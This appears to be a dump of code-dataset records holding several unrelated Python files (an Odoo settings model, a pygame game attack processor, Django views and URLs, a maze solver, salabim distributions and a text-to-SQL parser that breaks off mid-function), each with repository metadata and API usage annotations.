"torch.cuda.is_available", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.str", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.genfromtxt", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "src.models.graph_classification.test_model.normalize", "line_number": 52, "usage_type": "call"}, {"api_name": "src.models.graph_classification.test_model", "line_number": 52, "usage_type": "name"}, {"api_name": "scipy.sparse.eye", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 77, "usage_type": "call"}, {"api_name": "src.models.graph_classification.test_model.GCN", "line_number": 79, "usage_type": "call"}, {"api_name": "src.models.graph_classification.test_model", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 85, "usage_type": "name"}, {"api_name": "time.time", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 110, "usage_type": "name"}, {"api_name": "tqdm.notebook.tnrange", "line_number": 120, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 136, "usage_type": "attribute"}]}
+{"seq_id": "42022545751", "text": "# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models\nimport logging\nimport ast\n_logger = logging.getLogger('SoL-Qty')\n\n\nclass ResConfigSettings(models.TransientModel):\n \n _inherit = 'res.config.settings'\n \n #sol_qty_other_company_ids = fields.One2many('sale.qty.other.company',related=\"company_id.sol_qty_other_company_ids\")\n sol_qty_other_company_ids = fields.Many2many(\"sale.qty.other.company\",string='Company SoL Qty. Settings')\n sol_qty = fields.Selection([('qty_on_hand', 'Quantity on Hand'),\n ('qty_forecasted', 'Forecasted Quantity'), ('qty_available', 'Available Quantity')], default='qty_on_hand', \n string=\"SOL Available Qty\", related=\"company_id.sol_qty\",\n help=\"\"\"Quantity on Hand: Is the quantity of the selected product currently in the warehouse.\\n\n Forecasted Quantity: Is the forecasted quantity or \"quantity to be\" of the selected product.\\n\n Available Quantity: Is the quantity on hand minus the reserved quantity of the selected product.\"\"\")\n \n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n# rec_ids = self.env['ir.config_parameter'].sudo().get_param('sol_qty_available.sol_qty_other_company_ids')\n rec_ids = self.env['sale.qty.other.company'].sudo().search([]).ids\n _logger.info(rec_ids)\n# if not rec_ids:\n res.update(sol_qty_other_company_ids=[(6, 0, rec_ids)])\n# else:\n# res.update(sol_qty_other_company_ids=[(6, 0, ast.literal_eval(rec_ids))])\n return res\n \n# @api.multi\n# def set_values(self):\n# super(ResConfigSettings, self).set_values()\n# set_param = self.env['ir.config_parameter'].sudo().set_param\n# set_param('sol_qty_available.sol_qty_other_company_ids', self.sol_qty_other_company_ids.ids)", "repo_name": "szenma/odoo12module", "sub_path": "sol_qty_available/model/res_config_settings.py", "file_name": "res_config_settings.py", "file_ext": "py", "file_size_in_byte": 1981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "odoo.models.TransientModel", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "odoo.fields.Many2many", "line_number": 14, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 14, "usage_type": "name"}, {"api_name": "odoo.fields.Selection", "line_number": 15, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 15, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 22, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "41975769506", "text": "import esper\nfrom component import *\nimport pygame\nfrom pygame.locals import *\n\nclass ProcessorAttack(esper.Processor):\n \"\"\" ProcessorAttack main class \"\"\"\n\n def __init__(self):\n super().__init__()\n\n def process(self):\n for oEntity, (oComponentAttack, oComponentPosition, oComponentRenderable) in self.world.get_components(ComponentAttack, ComponentPosition, ComponentRenderable):\n if oComponentAttack.bAttack == True:\n oComponentAttack.bAttack = False\n\n iAttackerDirectionX = self.world.component_for_entity(oEntity, ComponentDirection).iDirectionX\n iAttackerDirectionY = self.world.component_for_entity(oEntity, ComponentDirection).iDirectionY\n\n fAttackPositionX = oComponentPosition.fPositionX + oComponentRenderable.fWidth / 2\n fAttackPositionY = oComponentPosition.fPositionY + oComponentRenderable.fHeight / 2\n\n\n if iAttackerDirectionX == -1:\n fAttackPositionX -= oComponentRenderable.fWidth / 2 + oComponentAttack.fWidth\n fWidth = oComponentAttack.fWidth\n fHeight = oComponentAttack.fHeight\n elif iAttackerDirectionX == 1:\n fAttackPositionX += oComponentRenderable.fWidth / 2\n fWidth = oComponentAttack.fWidth\n fHeight = oComponentAttack.fHeight\n else:\n pass\n\n if iAttackerDirectionY == -1:\n fAttackPositionY -= oComponentRenderable.fHeight / 2 + oComponentAttack.fWidth\n fWidth = oComponentAttack.fHeight\n fHeight = oComponentAttack.fWidth\n elif iAttackerDirectionY == 1:\n fAttackPositionY += oComponentRenderable.fHeight / 2\n fWidth = oComponentAttack.fHeight\n fHeight = oComponentAttack.fWidth\n else:\n pass\n\n iEntityAttack = self.world.create_entity()\n self.world.add_component(\n iEntityAttack,\n ComponentRenderable(\n oImage=pygame.image.load('greysquare.png')\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentCollision(\n oRectange = Rect(\n fAttackPositionX,\n fAttackPositionY,\n fWidth,\n fHeight\n ),\n bWall = False,\n iEntity = iEntityAttack\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentPosition(\n fPositionX = fAttackPositionX,\n fPositionY = fAttackPositionY\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentFrameLife(\n iFrame = oComponentAttack.iFrame\n )\n )\n self.world.add_component(\n iEntityAttack,\n ComponentDamage(\n iDamage = oComponentAttack.iDamage,\n iEntityProtect = oEntity\n )\n )\n\n if oComponentAttack.fVelocity != 0:\n fDirectionX = oComponentAttack.fVelocity * self.world.component_for_entity(oEntity, ComponentDirection).iDirectionX\n fDirectionY = oComponentAttack.fVelocity * self.world.component_for_entity(oEntity, ComponentDirection).iDirectionY\n\n self.world.add_component(\n iEntityAttack,\n ComponentVelocity(\n fDirectionX = fDirectionX,\n fDirectionY = fDirectionY\n )\n )\n", "repo_name": "agivern/pythonTraining", "sub_path": "processor/processorAttack.py", "file_name": "processorAttack.py", "file_ext": "py", "file_size_in_byte": 4097, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "esper.Processor", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 50, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 50, "usage_type": "attribute"}]}
+{"seq_id": "24841860069", "text": "from django.urls import path\nfrom .views import views\n\nurlpatterns = [\n path(\"use_case\", views.add_use_case),\n path(\"list_simulators\", views.list_simulators),\n path(\"restart_simulator\", views.restart_simulator),\n path(\"stop_simulator\", views.stop_simulator),\n path(\"check_status\", views.check_status),\n]\n", "repo_name": "MMostafa-Hub/GS-Headway-Docker-Django-API", "sub_path": "timeseries_project/api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 319, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "views.views.add_use_case", "line_number": 5, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.views.list_simulators", "line_number": 6, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.views.restart_simulator", "line_number": 7, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.views.stop_simulator", "line_number": 8, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.views.check_status", "line_number": 9, "usage_type": "attribute"}, {"api_name": "views.views", "line_number": 9, "usage_type": "name"}]}
+{"seq_id": "5809009941", "text": "from collections import deque\ndef solution(maps):\n dx = [1, -1, 0, 0]\n dy = [0, 0, 1, -1]\n result = []\n\n for row in range(len(maps)):\n for col in range(len(maps[0])):\n if maps[row][col] == 'S':\n start = (row, col, 0)\n if maps[row][col] == 'L':\n lever = (row, col, 0)\n if maps[row][col] == 'E':\n end = (row, col, 0)\n order = [[start, lever], [lever, end]]\n \n for s, e in order:\n visited = set(s)\n queue = deque([s])\n answer = -1\n while queue:\n x, y, t = queue.popleft()\n if (x, y) == (e[0], e[1]):\n answer = t\n break\n for i in range(4):\n mx, my = x + dx[i], y + dy[i]\n if mx < 0 or mx >= len(maps) or my < 0 or my >= len(maps[0]) or (mx, my) in visited or maps[mx][my] == 'X':\n continue\n queue.append((mx, my, t+1))\n visited.add((mx, my))\n if answer == -1:\n return -1\n result.append(answer)\n return sum(result)", "repo_name": "Liebestraum1/Algorithm_Python", "sub_path": "Programmers/Level_2/미로 탈출.py", "file_name": "미로 탈출.py", "file_ext": "py", "file_size_in_byte": 1113, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "70019411607", "text": "# views.py\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import AssignmentCreationForm\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\nfrom accounts.views import fetch_students\n\n\ndef create_assignment(request):\n if request.method == \"POST\":\n form = AssignmentCreationForm(request.POST)\n if form.is_valid():\n assignment = form.save(commit=False)\n assignment.lecturer = (\n request.user.lecturer\n ) # Associate assignment with the logged-in lecturer\n assignment.save()\n return redirect(\n \"assignment_list\"\n ) # Redirect to a list of assignments or a success page\n else:\n form = AssignmentCreationForm()\n\n return render(request, \"accounts/lecturers/create_assignment.html\", {\"form\": form})\n\n\ndef allStudents(request):\n students = fetch_students()\n context = {\"students\": students}\n return render(request, \"lecturers/allStudents.html\", context)\n\n\ndef success(request):\n return render(request, \"success.html\")\n\n\ndef lecturers(request):\n return render(request, \"lecturers.html\")\n", "repo_name": "HeartfeltDevelopers/heartfeltInstitute", "sub_path": "lecturers/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "forms.AssignmentCreationForm", "line_number": 11, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "forms.AssignmentCreationForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "accounts.views.fetch_students", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "74721909207", "text": "\"\"\"Random distributions for the simulation model.\n\nThis module overrides the :py:class:`~salabim.Constant` and\n:py:class:`~salabim.Triangular` classes in :py:mod:`salabim`\nto provide better string representations, and adds a PERT distribution.\n\nSee: https://en.wikipedia.org/wiki/PERT_distribution\n\"\"\"\n\nfrom typing import Union\n\nimport salabim as sim\n\n\nclass Constant(sim.Constant):\n \"\"\"Constant distribution.\n\n Attributes:\n _value (float)\n \"\"\"\n\n def __repr__(self) -> str:\n return f'Constant({self._value}, time_unit={self.time_unit})'\n\n\nclass Tri(sim.Triangular):\n \"\"\"Triangular distribution.\n\n Attributes\n ----------\n _low: float\n Minimum of the distribution\n _mode: float | None\n Mode of the distribution. If None, replaced with the mean of `_low` and `_high`.\n _high: float | None\n Maximum of the distribution. If None, replaced with `_min`, thus forming a constant\n distribution.\n \"\"\"\n\n def __init__(\n self,\n low: float,\n mode: float | None = None,\n high: float | None = None,\n time_unit: str | None = None,\n randomstream=None,\n env: sim.Environment | None = None\n ) -> None:\n # Reorder low,high,mode parameters\n super().__init__(low, high, mode, time_unit, randomstream, env)\n\n def __repr__(self) -> str:\n return f\"Triangular(low={self._low}, mode={self._mode}, high={self._high}, \"\\\n f\"time_unit={self.time_unit})\"\n\n\nclass PERT(sim.Triangular):\n \"\"\"PERT distribution.\n\n A three-point distribution with more probability mass around the mode than the\n triangular distribution. The mean of the distribution is\n ``(_low + _shape * _mode + _high) / (_shape + 2)``.\n By default, ``_shape = 4``.\n\n Attributes\n ----------\n _low: float\n Minimum of the distribution\n _mode: float | None\n Mode of the distribution. If None, replaced with the mean of `_low` and `_high`.\n _high: float | None\n Maximum of the distribution. If None, replaced with `_min`, thus forming a constant\n distribution.\n \"\"\"\n\n def __init__(\n self,\n low: float,\n mode: float | None = None,\n high: float | None = None,\n time_unit: str | None = None,\n randomstream=None,\n env: sim.Environment | None = None,\n ) -> None:\n super().__init__(low, high, mode, time_unit, randomstream, env)\n self._shape = 4\n\n self._range = high - low\n self._alpha = 1 + self._shape * (mode - low) / self._range\n self._beta = 1 + self._shape * (high - mode) / self._range\n\n self._mean = (low + self._shape * mode + high) / (self._shape + 2)\n\n def __repr__(self) -> str:\n return f\"PERT(low={self._low}, mode={self._mode}, high={self._high}, \"\\\n f\"shape={self._shape}, time_unit={self.time_unit})\"\n\n def print_info(self, as_str: bool = False, file: sim.TextIO | None = None) -> str:\n \"\"\" Print info about the distribution.\n\n :meta private:\n \"\"\"\n result = []\n result.append(\"PERT \" + hex(id(self)))\n result.append(\" low=\" + str(self._low) + \" \" + self.time_unit)\n result.append(\" high=\" + str(self._high) + \" \" + self.time_unit)\n result.append(\" mode=\" + str(self._mode) + \" \" + self.time_unit)\n result.append(\" shape=\" + str(self._shape))\n result.append(\" randomstream=\" + hex(id(self.randomstream)))\n return sim.return_or_print(result, as_str, file)\n\n def sample(self) -> float:\n \"\"\":meta private:\"\"\"\n beta = self.randomstream.betavariate\n val = self._low + beta(self._alpha, self._beta) * self._range\n return val * self.time_unit_factor\n\n def mean(self) -> float:\n \"\"\":meta private:\"\"\"\n return self._mean * self.time_unit_factor\n\n\nDistribution = Union[Constant, Tri, PERT]\n\n\nclass IntPERT:\n \"\"\"Discretized PERT distribution.\"\"\"\n\n def __init__(self, low: int, mode: int, high: int, env: sim.Environment):\n self.low = low\n \"\"\"Minimum of the distribution.\"\"\"\n\n self.mode = mode\n \"\"\"Mode of the distribution.\"\"\"\n\n self.high = high\n \"\"\"Maximum of the distribution.\"\"\"\n\n self.pert = PERT(low-mode-0.5, 0, high-mode+0.5, env=env)\n \"\"\"Underlying continuous PERT distribution, i.e.\n ``PERT(low-mode-0.5, 0, high-mode+0.5)``.\"\"\"\n\n def sample(self) -> int:\n \"\"\"Sample the distribution.\"\"\"\n return self()\n\n def __call__(self) -> int:\n # Round towards 0 and add the mode\n return int(self.pert.sample()) + self.mode\n\n def __repr__(self) -> str:\n return f'IntPERT({self.low}, {self.mode}, {self.high})'\n", "repo_name": "yinchi/cuh-dashboards", "sub_path": "hpath/distributions.py", "file_name": "distributions.py", "file_ext": "py", "file_size_in_byte": 4755, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "salabim.Constant", "line_number": 15, "usage_type": "attribute"}, {"api_name": "salabim.Triangular", "line_number": 26, "usage_type": "attribute"}, {"api_name": "salabim.Environment", "line_number": 47, "usage_type": "attribute"}, {"api_name": "salabim.Triangular", "line_number": 57, "usage_type": "attribute"}, {"api_name": "salabim.Environment", "line_number": 83, "usage_type": "attribute"}, {"api_name": "salabim.TextIO", "line_number": 98, "usage_type": "attribute"}, {"api_name": "salabim.return_or_print", "line_number": 110, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 123, "usage_type": "name"}, {"api_name": "salabim.Environment", "line_number": 129, "usage_type": "attribute"}]}
+{"seq_id": "70968750167", "text": "################################\n# Assumptions:\n# 1. sql is correct\n# 2. only table name has alias\n# 3. only one intersect/union/except\n#\n# val: number(float)/string(str)/sql(dict)\n# col_unit: (agg_id, col_id, isDistinct(bool))\n# val_unit: (unit_op, col_unit1, col_unit2)\n# table_unit: (table_type, col_unit/sql)\n# cond_unit: (not_op, op_id, val_unit, val1, val2)\n# condition: [cond_unit1, 'and'/'or', cond_unit2, ...]\n# sql {\n# 'select': (isDistinct(bool), [(agg_id, val_unit), (agg_id, val_unit), ...])\n# 'from': {'table_units': [table_unit1, table_unit2, ...], 'conds': condition}\n# 'where': condition\n# 'groupBy': [col_unit1, col_unit2, ...]\n# 'orderBy': ('asc'/'desc', [val_unit1, val_unit2, ...])\n# 'having': condition\n# 'limit': None/limit value\n# 'intersect': None/sql\n# 'except': None/sql\n# 'union': None/sql\n# }\n################################\n\nfrom __future__ import print_function\nimport os, sys\nimport json\nimport sqlite3\nimport traceback\nimport argparse\n\nimport json\nimport sqlite3\nfrom nltk import word_tokenize\n\nCLAUSE_KEYWORDS = ('select', 'from', 'where', 'group', 'order', 'limit', 'intersect', 'union', 'except')\nJOIN_KEYWORDS = ('join', 'on', 'as')\n\nWHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')\nUNIT_OPS = ('none', '-', '+', \"*\", '/')\nAGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')\nTABLE_TYPE = {\n 'sql': \"sql\",\n 'table_unit': \"table_unit\",\n}\n\nCOND_OPS = ('and', 'or')\nSQL_OPS = ('intersect', 'union', 'except')\nORDER_OPS = ('desc', 'asc')\n\n# from process_sql import tokenize, get_schema, get_tables_with_alias, Schema, get_sql\n\n# Flag to disable value evaluation\nDISABLE_VALUE = True\n# Flag to disable distinct in select evaluation\nDISABLE_DISTINCT = True\n\n\nCLAUSE_KEYWORDS = ('select', 'from', 'where', 'group', 'order', 'limit', 'intersect', 'union', 'except')\nJOIN_KEYWORDS = ('join', 'on', 'as')\n\nWHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')\nUNIT_OPS = ('none', '-', '+', \"*\", '/')\nAGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')\nTABLE_TYPE = {\n 'sql': \"sql\",\n 'table_unit': \"table_unit\",\n}\n\nCOND_OPS = ('and', 'or')\nSQL_OPS = ('intersect', 'union', 'except')\nORDER_OPS = ('desc', 'asc')\n\n\nHARDNESS = {\n \"component1\": ('where', 'group', 'order', 'limit', 'join', 'or', 'like'),\n \"component2\": ('except', 'union', 'intersect')\n}\n\nclass Schema:\n \"\"\"\n Simple schema which maps table&column to a unique identifier\n \"\"\"\n def __init__(self, schema):\n self._schema = schema\n self._idMap = self._map(self._schema)\n\n @property\n def schema(self):\n return self._schema\n\n @property\n def idMap(self):\n return self._idMap\n\n def _map(self, schema):\n idMap = {'*': \"__all__\"}\n id = 1\n for key, vals in schema.items():\n for val in vals:\n idMap[key.lower() + \".\" + val.lower()] = \"__\" + key.lower() + \".\" + val.lower() + \"__\"\n id += 1\n\n for key in schema:\n idMap[key.lower()] = \"__\" + key.lower() + \"__\"\n id += 1\n\n return idMap\n\n\ndef get_schema(db):\n \"\"\"\n Get database's schema, which is a dict with table name as key\n and list of column names as value\n :param db: database path\n :return: schema dict\n \"\"\"\n\n schema = {}\n conn = sqlite3.connect(db)\n cursor = conn.cursor()\n\n # fetch table names\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables = [str(table[0].lower()) for table in cursor.fetchall()]\n\n # fetch table info\n for table in tables:\n cursor.execute(\"PRAGMA table_info({})\".format(table))\n schema[table] = [str(col[1].lower()) for col in cursor.fetchall()]\n\n return schema\n\n\ndef get_schema_from_json(fpath):\n with open(fpath) as f:\n data = json.load(f)\n\n schema = {}\n for entry in data:\n table = str(entry['table'].lower())\n cols = [str(col['column_name'].lower()) for col in entry['col_data']]\n schema[table] = cols\n\n return schema\n\n\ndef tokenize(string):\n string = str(string)\n string = string.replace(\"\\'\", \"\\\"\") # ensures all string values wrapped by \"\" problem??\n quote_idxs = [idx for idx, char in enumerate(string) if char == '\"']\n assert len(quote_idxs) % 2 == 0, \"Unexpected quote\"\n\n # keep string value as token\n vals = {}\n for i in range(len(quote_idxs)-1, -1, -2):\n qidx1 = quote_idxs[i-1]\n qidx2 = quote_idxs[i]\n val = string[qidx1: qidx2+1]\n key = \"__val_{}_{}__\".format(qidx1, qidx2)\n string = string[:qidx1] + key + string[qidx2+1:]\n vals[key] = val\n\n toks = [word.lower() for word in word_tokenize(string)]\n # replace with string value token\n for i in range(len(toks)):\n if toks[i] in vals:\n toks[i] = vals[toks[i]]\n\n # find if there exists !=, >=, <=\n eq_idxs = [idx for idx, tok in enumerate(toks) if tok == \"=\"]\n eq_idxs.reverse()\n prefix = ('!', '>', '<')\n for eq_idx in eq_idxs:\n pre_tok = toks[eq_idx-1]\n if pre_tok in prefix:\n toks = toks[:eq_idx-1] + [pre_tok + \"=\"] + toks[eq_idx+1: ]\n\n return toks\n\n\ndef scan_alias(toks):\n \"\"\"Scan the index of 'as' and build the map for all alias\"\"\"\n as_idxs = [idx for idx, tok in enumerate(toks) if tok == 'as']\n alias = {}\n for idx in as_idxs:\n alias[toks[idx+1]] = toks[idx-1]\n return alias\n\n\ndef get_tables_with_alias(schema, toks):\n tables = scan_alias(toks)\n for key in schema:\n assert key not in tables, \"Alias {} has the same name in table\".format(key)\n tables[key] = key\n return tables\n\n\ndef parse_col(toks, start_idx, tables_with_alias, schema, default_tables=None):\n \"\"\"\n :returns next idx, column id\n \"\"\"\n tok = toks[start_idx]\n if tok == \"*\":\n return start_idx + 1, schema.idMap[tok]\n\n if '.' in tok: # if token is a composite\n alias, col = tok.split('.')\n key = tables_with_alias[alias] + \".\" + col\n return start_idx+1, schema.idMap[key]\n\n assert default_tables is not None and len(default_tables) > 0, \"Default tables should not be None or empty\"\n\n for alias in default_tables:\n table = tables_with_alias[alias]\n if tok in schema.schema[table]:\n key = table + \".\" + tok\n return start_idx+1, schema.idMap[key]\n\n assert False, \"Error col: {}\".format(tok)\n\n\ndef parse_col_unit(toks, start_idx, tables_with_alias, schema, default_tables=None):\n \"\"\"\n :returns next idx, (agg_op id, col_id)\n \"\"\"\n idx = start_idx\n len_ = len(toks)\n isBlock = False\n isDistinct = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n if toks[idx] in AGG_OPS:\n agg_id = AGG_OPS.index(toks[idx])\n idx += 1\n assert idx < len_ and toks[idx] == '('\n idx += 1\n if toks[idx] == \"distinct\":\n idx += 1\n isDistinct = True\n idx, col_id = parse_col(toks, idx, tables_with_alias, schema, default_tables)\n assert idx < len_ and toks[idx] == ')'\n idx += 1\n return idx, (agg_id, col_id, isDistinct)\n\n if toks[idx] == \"distinct\":\n idx += 1\n isDistinct = True\n agg_id = AGG_OPS.index(\"none\")\n idx, col_id = parse_col(toks, idx, tables_with_alias, schema, default_tables)\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1 # skip ')'\n\n return idx, (agg_id, col_id, isDistinct)\n\n\ndef parse_val_unit(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n isBlock = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n col_unit1 = None\n col_unit2 = None\n unit_op = UNIT_OPS.index('none')\n\n idx, col_unit1 = parse_col_unit(toks, idx, tables_with_alias, schema, default_tables)\n if idx < len_ and toks[idx] in UNIT_OPS:\n unit_op = UNIT_OPS.index(toks[idx])\n idx += 1\n idx, col_unit2 = parse_col_unit(toks, idx, tables_with_alias, schema, default_tables)\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1 # skip ')'\n\n return idx, (unit_op, col_unit1, col_unit2)\n\n\ndef parse_table_unit(toks, start_idx, tables_with_alias, schema):\n \"\"\"\n :returns next idx, table id, table name\n \"\"\"\n idx = start_idx\n len_ = len(toks)\n key = tables_with_alias[toks[idx]]\n\n if idx + 1 < len_ and toks[idx+1] == \"as\":\n idx += 3\n else:\n idx += 1\n\n return idx, schema.idMap[key], key\n\n\ndef parse_value(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n\n isBlock = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n if toks[idx] == 'select':\n idx, val = parse_sql(toks, idx, tables_with_alias, schema)\n elif \"\\\"\" in toks[idx]: # token is a string value\n val = toks[idx]\n idx += 1\n else:\n try:\n val = float(toks[idx])\n idx += 1\n except:\n end_idx = idx\n while end_idx < len_ and toks[end_idx] != ',' and toks[end_idx] != ')'\\\n and toks[end_idx] != 'and' and toks[end_idx] not in CLAUSE_KEYWORDS and toks[end_idx] not in JOIN_KEYWORDS:\n end_idx += 1\n\n idx, val = parse_col_unit(toks[start_idx: end_idx], 0, tables_with_alias, schema, default_tables)\n idx = end_idx\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1\n\n return idx, val\n\n\ndef parse_condition(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n conds = []\n\n while idx < len_:\n idx, val_unit = parse_val_unit(toks, idx, tables_with_alias, schema, default_tables)\n not_op = False\n if toks[idx] == 'not':\n not_op = True\n idx += 1\n\n assert idx < len_ and toks[idx] in WHERE_OPS, \"Error condition: idx: {}, tok: {}\".format(idx, toks[idx])\n op_id = WHERE_OPS.index(toks[idx])\n idx += 1\n val1 = val2 = None\n if op_id == WHERE_OPS.index('between'): # between..and... special case: dual values\n idx, val1 = parse_value(toks, idx, tables_with_alias, schema, default_tables)\n assert toks[idx] == 'and'\n idx += 1\n idx, val2 = parse_value(toks, idx, tables_with_alias, schema, default_tables)\n else: # normal case: single value\n idx, val1 = parse_value(toks, idx, tables_with_alias, schema, default_tables)\n val2 = None\n\n conds.append((not_op, op_id, val_unit, val1, val2))\n\n if idx < len_ and (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\") or toks[idx] in JOIN_KEYWORDS):\n break\n\n if idx < len_ and toks[idx] in COND_OPS:\n conds.append(toks[idx])\n idx += 1 # skip and/or\n\n return idx, conds\n\n\ndef parse_select(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n\n assert toks[idx] == 'select', \"'select' not found\"\n idx += 1\n isDistinct = False\n if idx < len_ and toks[idx] == 'distinct':\n idx += 1\n isDistinct = True\n val_units = []\n\n while idx < len_ and toks[idx] not in CLAUSE_KEYWORDS:\n agg_id = AGG_OPS.index(\"none\")\n if toks[idx] in AGG_OPS:\n agg_id = AGG_OPS.index(toks[idx])\n idx += 1\n idx, val_unit = parse_val_unit(toks, idx, tables_with_alias, schema, default_tables)\n val_units.append((agg_id, val_unit))\n if idx < len_ and toks[idx] == ',':\n idx += 1 # skip ','\n\n return idx, (isDistinct, val_units)\n\n\ndef parse_from(toks, start_idx, tables_with_alias, schema):\n \"\"\"\n Assume in the from clause, all table units are combined with join\n \"\"\"\n assert 'from' in toks[start_idx:], \"'from' not found\"\n\n len_ = len(toks)\n idx = toks.index('from', start_idx) + 1\n default_tables = []\n table_units = []\n conds = []\n\n while idx < len_:\n isBlock = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n if toks[idx] == 'select':\n idx, sql = parse_sql(toks, idx, tables_with_alias, schema)\n table_units.append((TABLE_TYPE['sql'], sql))\n else:\n if idx < len_ and toks[idx] == 